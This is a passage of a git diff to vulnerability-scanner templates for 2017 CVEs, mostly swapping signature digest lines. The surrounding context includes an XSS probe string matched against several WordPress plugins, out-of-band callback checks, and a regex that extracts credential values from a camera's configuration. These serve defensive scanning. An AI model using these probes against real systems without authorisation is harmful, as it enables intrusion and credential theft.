490a00463044022100dcf0b1872f1e4b503b0af45ff58d2dd2d63f7c318e856f62fa9e9e737b583dcc021f756676a67d113a71da4ccd4e3136fc5299b660be6ff05f647b675444fe0f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index b060708a0b..3a88b0d928 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029e324ae86078771f7966a269328bfcbcbe6936a0ea4be26a3aa7d464e03985102206feb41aa4ca49f348a755fb8128515520fe3d45f4979f4fb8bf5ce642b8039a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 5e719cd684..e73fe4cd1a 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f42861bb6943a4d15b0b1d3395e4e7bd35611f410bbe8966b3fbcc368a0981b1022100e9ae78c33f21aa32aef0a555d60f034ddaa95205574bcbdd225cdfa87253bd89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index b4d57d72e3..460fc36583 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ea1156bb7aca36c6c5f6c4b32a5da0dd2a371d79ef01efc1f617333ca8ea40102200af36b5bdce7f177e9470a66b8d7efc415ba18d72c902af7e624a870db782b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 74055e74f8..f21ed85a11 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4a0a0047304502207cd86a94cd8aead4a49bbda3b690bb04c0f1febccfb6785b34b253cbab353f48022100e56e0a7397f05b7b5e043e8bf763fbcaf8ea0f17ab29aeecdf9fe91979b4c422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c217cf6634e20882d3d3c5617089a1d6c93945b233f5793c195bb2d7efcdcb2b0221008e821f6cbd160c00a7f0cf3c32fbd0668e25537e0400c293d97280ef0bbd9585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 3a88acbb5a..fa245ea667 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f2fb28a6fe0f4e727facb4c87f8183d1c05d941bc0c2f181108a7196c99f7850220083b85ba8d55c0817511ea3f1ed08a03e9f474c8c0849d351db0352bb7d98241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 34a0ccab1b..bdf1d39088 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dce2ddd796dc445298de0b036569d53a793dc981ca120153d192393eb4138b91022040b10fd80423f88a9e0bcfe1ba0dbb1621e43a2d2125149840e3524072ed75db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index b251907434..2986dfffc1 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 490a004630440220217ca670c25fd088273af9e902e6a30cf2ca9fa7555a0a0ad608454e147ef75c0220668e31fc705d4ceea309b1449b1311d65e0d07f98813067bb6205352b6e9985d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d14387bb807d60d92965e154331ac1f4dcf45276ab31045f5fa4aff1a4ad56f502205ec3a2018588e6e9fd95843db0d597aefa6494fcb532e57cf85856ad6081046f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index e3e4a1947e..19cb52f5d5 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055f7184ddba40ff8bc048f5fde8113756fd30099586ffa5b9de186dd6a8498e20221008eff9c034c2b21f9f1086faaa85dfa1e220a4f802f772f45005325021daa14a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index c491888c89..a44a70c343 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ef531d92525eaf4b6152954eebea1e6c23d7c515afce012b6c1223079ec3ad9002210086b9a6f9ffefa3c35ec6bbe9ee00c650696dced3b57ab09fe2c93ebc05d0a5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210095f1b8849e5c8ac04f646439eb2eb865483f6432fa2bb914e0942004393ffccc022100907a8ec81a4e92bfcf8c949f7d9e3853dc3033e1321a8ed4015f8aef930822e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index bf1d5a78ec..5c68ef701c 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1b8b53832c640443927a239b59a693a670b9bfc237cb699ba61b223cb8a652c022041096691678b98e9fcdf56d6d8535bb66cb180a08e91b26c5b46c3f4ce771c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index bb4ae4564f..0182d593bc 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a642d73b44074f3bbdf0efaccd2848c1c08663433c85afb0b7c479451a28fc9402210099b949219f2bc734a1a37836c79d73c465a52c7d36281dc1509ff0731b6fe843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 8cb0b0a3a0..417feb4dca 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe01c932c0e4cb28aaa09be35931901def6da9156423788f1273ce95ec25383e022100881310859f0fe8598816e9dd175b53807394c4e2606f0e34eaa6a4520c858649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 2243806246..1e38c2e008 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 490a0046304402202f2ce883ac28fa110099e93debcea93ba72a87c644e7d50eab47ba65b5b0c0010220263c16a96c6d3ee59ee4639403d581676533664e25e9d12ddafed64e9f58a560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed1b6c5d04f21c78e943b4993d472189e36df1733dc10800b62deca1bc6c18d2022014f77ec4de6a90b2c095c1dbdc5bb61e93e03eb6f5f3ecd1ec60f9703ee2e024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index c4889c31ea..fbd0973fd6 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b857ebe6869ee45f7dc4cff92ae7682a95b98286296b23281f2dfbdf01999732022100f8f5b927297f1d44346317dcd9659352a25a45199675628023f765a3d6a6cc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 7e99d9c7c3..8b35ceb57f 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 490a0046304402204ffa643dfec6a2a1304afeb8c507e527816e6ffdbf5bf55d1f78ce117196956c022062d2904783e48e1571ddcd034438544bd6ef716a64604b5cd204c9e6d93f17fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd3c538f6d53984acdce0e66fef97e1081a643dbb6921d756ebc88c5d4d2a65c022100ca84221f6ec3d788ebc71c032d4ece39ecca89429e9630d41c52dd3f169021c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index d40c5f2e22..519180be8c 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c10e42cf8c927b6c89715593cbc44a0eb7d70415e077c7cefc813541abfac28022100f611a234592239a4f01327dce894478ed0b4fba7ad216909b3e8166758c90381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index d32fcceffd..d7dbdba507 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f088907da44a2cfd70389dfaf174e89311d92a1172ac70a3c54dc21e056b198602205c275024f4e29ef71f7a5391b3e006873b4244b1eed2b06005d39186225cb401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 4a20213479..806074a32d 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100adad73e4ddbb122f6a74cd2eabb9fdba00f971d35e4fe0f330cd9489c8a85c220220035d45b55c8be488ed39701890033e2b69d9920dfcb71614149d760df5788bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 65c8cabca4..60c4d50b3c 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -58,4 +58,4 @@ http: part: body words: - "console.log" -# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051e9027e449edff73649c81fe3cdba7ea4987a418a629a8b42e46524a18db753022100fcab7edcab8e705beea02220885aaa95c1084399834295982ccc23d902f9795e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 4c6c339c2d..6f0e8b5a88 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -40,4 +40,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100a2ead70694f8fbe9b3e3642b2ba252925a11e895d24c116c6fcf822fec79ffc3022100cb724ed9183a630d2b16eb3ad1ea4e8dd9589e0005873b67061634479dbe51eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d29fdd415b29112463f116a395e27d57520ac8863b59435c3ab3bd8c9de579b2022100b98beb232332f6eb2c320dcb65057b007073e7c8ea50fd433ac91e2a9e86355a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 586de89eea..9c37ceeee1 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -61,4 +61,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450221009af3dc7a023956f425c329f162e8bf603416c546b1876ce01e72ac09119bc24202205406c351433b267b3312803f8f1cd75b9707dfc851008977f33e4db88e70404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100878940581311a5d9587aba613294a182d8de4a03d087fde8f3eb14269d7b253d02206ea04fe2355b669325164543d5b02337f05eccde9b61657d31142cd642735208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 088fe2c837..7725db6fc3 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -37,4 +37,4 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 4b0a00483046022100af3043267f661047f2abd255139659c6876cf783ed9a49639876eac74d86842f022100e4a34a3823612505eff0f06d3c4e61785f3cd30694b6d799da940a7b4bd501e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2e8be373cdfe4833f47e0738ec1a9f260610f9aaac5a8bcd4511f8ebd39ef7a022074324b0070bd1af8ec301343eee9810571eabec58ee24f22be7a44c8eb05436e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 7b4e5e57d0..e08ffdb597 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -48,4 +48,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092d78e5c2ee601a72fc1005ecee2f4d612d4e1e2ad952794c3c9b11b002f77cb0221008c9d309becc69658e90dcaaa56997b4ddc7bbd5f7964589f4253b715708a4b2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 25f3f5218d..665535b2a3 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bfed1bb3dad739a1ef9947e49b189c36f2e6b0b1d6f845ce934981c33f2633302202ba6d95bcd7b94e5cf7c6db6480c3a72fa840646907405d0f5cc57b7dfb6c1ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 985a6a668c..fd2a9dce04 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b13a1627744af175b5ff3208123d7121d1993c1da5916daba690480cb512f923022100fbb3814519400f6165a557af4ce8f740fd1f47aead0436e981e555de1894a22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204804f37982a6760d4e6547fa3508c53ef48322c15d3d9512e50a4fc96c88ce3f022100fe1c4fa3553083679aad75f77fd4f611edbe82fa0717876a4a5781a654f3a057:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index b61c01b8ad..2bc9106fca 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b00287c7a2a6ba526529b8d990b528ce377af16295c124a967356a08b6430f4202206dc31566afe6ca3dfcf7fbc70171e24f3e2c63902bdc59d568de62e08eafb897:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index bc2a7ea770..0dde2a8972 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220496ae546246d7f15d11e64df627664165cfcd3bb66143a4ae5ca128fd250d83e022100846622a1c08d291892cd39ad2e062cdaf36123efb0096ecdb6924824bb274096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024a8d29d33fa8252530cbb7f2948713c26ecce98344c9a9d976f12567408150c022100927252f4dcd48268d836e6b9155ee52daf04b3fcc9fc99e7a554874a57741681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 875939fb07..578a6a829d 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022022020aa8a873fc818a13eee28f236f26cae0b0aa75204ada8c216d36f82b6d7c022027edcd8a1cc6e78bf98d96759d25094658fc6bce1a48f195a363cece01b7f99c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220495b1fa854301eccccabfffc0d5758e79ca9d470d6c9daeed43c960791f9e12d022068e5219d420072a580169f3a2124207ad3774a71cbd02d18543af151bc886452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 823b523c7e..5cef3d8885 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220255b4c36fbfca640300f406d76a18de517faa9583bb267338fc7a2d4b36ac070022100e236f6809fd321445907dbc37b9c4def04ad09fc52f798e4324fa84812fd5331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032f11d9b1504fb042b6c91f441deb1a249e941dcbde63ac51f350b05b9e83f71022100875a24db627da0c59bd4743d91b6cca4c08dae7b6fa17d24f1a216284fd2b0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 23e75da196..ac61004431 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200b9e716101bb9f2757f476a63cfce5c17b9dd089a0ba767e03f491ecace39fb6022045455d4187be15412d331dd2b561c4328cdde8acc3c42a3de9f9ceb407376d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220158ca09ea384b1142ffa017940e328ef386bdf182bf063fa9cb058e9a9cb2b57022007c4d73a6544306d7581302f859a7724c44a9660e8374f67d47e3ec98208df3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 1eb505345d..47974bab8f 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096b16c5bc06532125db7042b4a42f48e1284d769136ba0ff69a0b0938ede6d12022100cafa979697e2e675dc8f09112269314d9b7262d802b971342f4a6f336ac9b9d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 607cd654fd..8f03aa5507 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -45,4 +45,4 @@ http: part: header words: - "application/xml" -# digest: 4b0a00483046022100c915ea5b7a67b269e652cfe5189fbeef5beca1a6e3a09c0ee59298ed9bfbede3022100a8f03caa34047f0f2cd4751cf4c772529f216a56e3e91553f99c1a7eef9bd6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fc20ee39e85f5fe1fee30017bf018dd548bd28468bc79ff6924b19001a637dc022100f9a502ee528a29825061ad581ea1efce6ba69e6cb7f6b655966e2117fb40ded1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 14972a640b..50fabcbed7 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -48,4 +48,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb029caf367f8db0b6350bdbb7b05a9622f3697a1629618e6bd455078d7793ba022100d707398eb77439d4e9261fb482ffd40bd033da6cf31d4178e5e6549d3cc6d8e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 81fc123f6c..8e9d3f09cd 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -45,4 +45,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 490a0046304402202a42607f81069bc80a480ecb156ace94e0e76862ee4d3c4f68a9b927f241d59402207c07437e69c7376ab7c771a7bb2fa469bcc225985cb16e57a19da92fe3f20241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220337c1a3d26746ee57aa8f2c45501e6031aff3aaeb6755d63a78d80d6bacba95f0220189d68a3a43e09495d3dcee847b6c11e956d2a63eb2ada3ff898d3c6d2a01dc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index de35bb88ae..0f7bc4af52 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ 